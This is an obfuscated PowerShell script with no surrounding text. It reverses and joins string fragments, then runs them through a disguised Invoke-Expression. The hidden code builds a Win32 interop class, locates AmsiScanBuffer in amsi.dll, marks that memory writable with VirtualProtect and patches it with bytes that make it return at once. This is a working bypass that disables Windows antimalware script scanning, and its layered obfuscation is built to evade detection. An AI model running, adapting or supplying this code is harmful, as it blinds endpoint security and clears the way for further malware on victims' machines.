SV 4vAPd ([CHAR[] ]"xei| )63]rahc[,)701]rahc[+001]rahc[+501]rahc[(ecalPErc- 43]rahc[,)15]rahc[+05]rahc[+311]rahc[( ecalPErc-)')'+'6 ,sser'+'ddAkd'+'i '+',0 ,'+'hc'+'taPkdi(yp'+'oC:'+':'+']'+'lahsraM'+'.sec'+'iv'+'r'+'eS'+'por'+'et'+'nI.e'+'mi'+'tn'+'uR.me'+'t'+'syS[
'+')3'+'Cx'+'0 '+',08x0 ,70x'+'0 ,00x0 ,75x0 ,8Bx0( ]][ety'+'B[ = hctaPkd'+'i
)pkd'+'i]fe'+'r[ '+',04x'+'0 ,5]2'+'3t'+'ni'+'u[ ,sserd'+'dAkdi(tce'+'torPlautri'+'V::'+']'+'2'+'3niW'+'[
0 '+'='+' pkdi'+'
'+')3'+'2qreff'+'u'+'B32'+'q + 32qnacS'+'32q'+' +'+' 32qismA32q'+' ,yrarbiLdaoLkd'+'i(sserddAcorPte'+'G::]2'+'3'+'niW'+'[ ='+' sserddAkdi
'+')32q'+'ll'+'d'+'.is'+'32q'+' +'+' 32qma32q(yrar'+'biLdao'+'L::]'+'2'+'3ni'+'W[ = yra'+'rbi'+'Lda'+'oLkdi

'+'23n'+'i'+'Wk'+'di epyT-'+'ddA

'+'@3'+'2'+'q
}

;'+')tcetorPdlOlfp'+'l tniu tu'+'o ,tcetor'+'PweNl'+'f'+' tn'+'iu'+' ,eziSwd'+' rtPtnIU ,sserddAp'+'l r'+'tPt'+'nI(tcetorP'+'l'+'autriV loo'+'b '+'nr'+'et'+'xe c'+'i'+'tats cilbup   '+' 
])32q23len'+'rek'+'32q(t'+'ropmI'+'llD[ '+'   

'+''+';)'+'e'+'man'+' gni'+'rts(yr'+'arbiLdaoL rt'+'P'+'tnI nret'+'x'+'e'+' cita'+'ts '+'cil'+'bup '+'  '+' 
'+']'+')32q'+'23l'+'enrek'+'32q'+'('+'tropmIll'+'D[   '+' 

;)emaN'+'cor'+'p gnirt'+'s '+',elu'+'doMh'+' rtPtnI'+'('+'sserdd'+'A'+'corP'+'te'+'G'+' r'+'tPtnI'+' nr'+'etx'+'e'+' citats cilb'+'up '+'  '+' 
'+']'+')'+'32q'+'23l'+'en'+'r'+'ek32q'+'(t'+'ropmIllD['+'    

{ 23ni'+'W ssalc cilbup
'+'
'+';secivreSporet'+'nI.'+'emit'+'n'+'uR'+'.m'+'etsy'+'S gnisu
;me'+'tsyS'+' gnisu

32q@ = 2'+'3n'+'i'+'Wkdi'(("  ); [ArRAY]::rEveRSe( $4VAPD);&((gEt-vARiaBle '*mDR*').NaMe[3,11,2]-Join'') ( -JOIn$4VAPD ) 
